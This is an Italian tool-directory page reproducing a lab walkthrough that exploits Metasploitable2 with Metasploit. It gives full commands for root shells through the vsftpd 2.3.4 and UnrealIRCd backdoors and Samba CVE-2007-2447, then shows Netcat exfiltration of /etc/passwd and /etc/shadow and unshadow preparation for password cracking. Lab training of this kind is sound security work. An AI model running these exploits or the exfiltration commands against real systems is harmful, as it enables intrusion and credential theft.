Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
metasploitable2-exploitation-metasploit — Guida completa allo sfruttamento con Metasploit contro Metasploitable2 — backdoor vsftpd, Samba CVE-2007-2447, backdoor UnrealIRCd, esfiltrazione tramite Netcat e preparazione al cracking delle credenziali. | Kitploit
Strumenti/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
Password CrackingRicognizioneFramework di ExploitMappatura della ReteAnalisi delle VulnerabilitàExploitEsfiltrazione DatiPenetration TestingCommand and Control

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Apprendimento e Formazione
Sviluppo Payload
Lab e Pratica
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Guida completa allo sfruttamento con Metasploit contro Metasploitable2 — backdoor vsftpd, Samba CVE-2007-2447, backdoor UnrealIRCd, esfiltrazione tramite Netcat e preparazione al cracking delle credenziali.

Vedi Repository
1 mese faNon ancora revisionato

Sfruttare Metasploitable2 con Metasploit: VSFTPD, Samba e altro

Una guida pratica allo sfruttamento utilizzando il Metasploit Framework — dalla configurazione del database PostgreSQL e la scansione db_nmap, attraverso tre shell root via vsftpd, Samba e UnrealIRCd, fino all'esfiltrazione delle credenziali con Netcat.


Panoramica

Questo repository documenta un impegno completo di Metasploit contro Metasploitable2 in un laboratorio VirtualBox isolato. Argomenti trattati:

  • Configurazione di Metasploit con un backend PostgreSQL e workspace
  • Esecuzione di db_nmap per salvare i risultati della scansione direttamente nel database
  • Sfruttamento del backdoor vsftpd 2.3.4 (compromissione della supply chain)
  • Sfruttamento di Samba CVE-2007-2447 (iniezione di comandi usermap_script)
  • Esfiltrazione di /etc/passwd e /etc/shadow tramite Netcat e unione con unshadow
  • Sfruttamento del backdoor UnrealIRCd 3.2.8.1

Ambiente di laboratorio

MacchinaRuoloIndirizzo IP
Kali Linux 2026.1Attaccante192.168.1.4
Metasploitable2Target192.168.1.3

Rete: 192.168.1.0/24 — rete NAT completamente isolata all'interno di VirtualBox.


Passo 1 — Configurazione di Metasploit e scansione con database

root@kitploit:~
# Start PostgreSQL and initialize the database (one time only)
sudo systemctl start postgresql
sudo msfdb init

# Launch Metasploit
msfconsole

Kali e Metasploitable2 in esecuzione

Aggiornamento Kali e avvio PostgreSQL

root@kitploit:~
msf6> db_status           # Verify: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # Confirm active workspace

Output di db_status e workspace

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

Scansione db_nmap in corso

root@kitploit:~
msf6> hosts
msf6> services

Output di hosts e services

Due server FTP trovati su Metasploitable2:

PortaServizioInformazioni
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

Passo 2 — Sfruttamento di vsftpd 2.3.4 (Backdoor)

Nel luglio 2011, l'archivio sorgente di vsftpd 2.3.4 è stato compromesso — è stato inserito un backdoor che apre una shell root sulla porta 6200 quando il nome utente FTP contiene :). CVE: CVE-2011-2523. Diff del codice: https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# Result: exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

Info exploit vsftpd - parte 1

Info exploit vsftpd - parte 2

vsftpd mostra opzioni

vsftpd imposta RHOSTS RPORT LHOST

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

Esecuzione exploit vsftpd e sessione Meterpreter

ls sul filesystem root remoto

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Output di whoami root e uname -a

Estrai password hashate:

root@kitploit:~
cat /etc/shadow | grep '$1'

Password hashate del file shadow


Passo 3 — Sfruttamento di Samba CVE-2007-2447

Le versioni di Samba 3.0.0–3.0.25rc3 passano meta-caratteri della shell nel campo username direttamente a /bin/sh tramite l'opzione username map script — prima che avvenga l'autenticazione. Metasploitable2 esegue Samba 3.0.20-Debian.

root@kitploit:~
msf6> search type:exploit name:samba
# ~7 exploits found

msf6> use exploit/multi/samba/usermap_script
msf6> info

Elenco exploit Samba dalla ricerca

Info Samba usermap_script

Descrizione CVE Samba e riferimenti

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Esecuzione exploit Samba - sessione aperta

whoami root e smbd --version sulla shell Samba

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Esfiltrazione file con Netcat

Tab 2 — Kali (ricezione):

root@kitploit:~
nc -l -p 4567 > passwd.txt

Tab 1 — Shell exploit (invio):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Listener Netcat su Kali in ricezione passwd

Contenuto di passwd.txt dopo l'esfiltrazione

Ripeti per /etc/shadow, poi unisci:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

Passo 4 — Sfruttamento di UnrealIRCd 3.2.8.1 (Backdoor)

UnrealIRCd 3.2.8.1 è stato distribuito con un backdoor nel suo codice sorgente. L'invio di AB alla porta 6667 fa sì che il server esegua qualsiasi comando successivo come root — nessuna autenticazione richiesta.

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

Opzioni exploit UnrealIRCd ed esecuzione

Shell root UnrealIRCd - whoami e uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Opzioni richieste:


Flusso di lavoro Metasploit a colpo d'occhio

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

Errori comuni


Punti chiave

  • vsftpd 2.3.4 e UnrealIRCd 3.2.8.1 erano entrambi compromissioni della supply chain — backdoor incorporati negli archivi di distribuzione ufficiali
  • CVE-2007-2447 in Samba viene attivato prima dell'autenticazione — la patch è l'unica mitigazione
  • Netcat non richiede dipendenze e funziona per l'esfiltrazione di file su praticamente qualsiasi sistema Unix
  • info prima di exploit è un'abitudine che vale la pena sviluppare — mostra CVE, versioni interessate e opzioni richieste

🌐 Connettiti con me

LinkedIn Dev.to

Scarica lo strumento
OpzioneValoreDescrizione
RHOSTS192.168.1.3IP target
RPORT6667Porta predefinita IRC
LHOST192.168.1.4IP listener Kali
payloadcmd/unix/bind_netcatShell bind via Netcat
ErroreCosa succedeSoluzione
Saltare msfdb initNessun database — i risultati della scansione non vengono salvatiEsegui sudo msfdb init una volta prima del primo utilizzo
Non impostare LHOSTLa shell reverse non ha dove chiamareImposta sempre LHOST sul tuo IP Kali
Eseguire msfdb init ogni sessioneSovrascrive i dati esistentiEsegui una sola volta; verifica con sudo msfdb status
RPORT erratoL'exploit fallisce silenziosamenteConferma la porta da services prima di impostare
Chiudere il listener Netcat troppo prestoTrasferimento file troncatoAttendi un momento dopo il comando pipe prima di CTRL-C
Saltare unshadowI cracker di password rifiutano il formato file divisoUnisci sempre passwd e shadow prima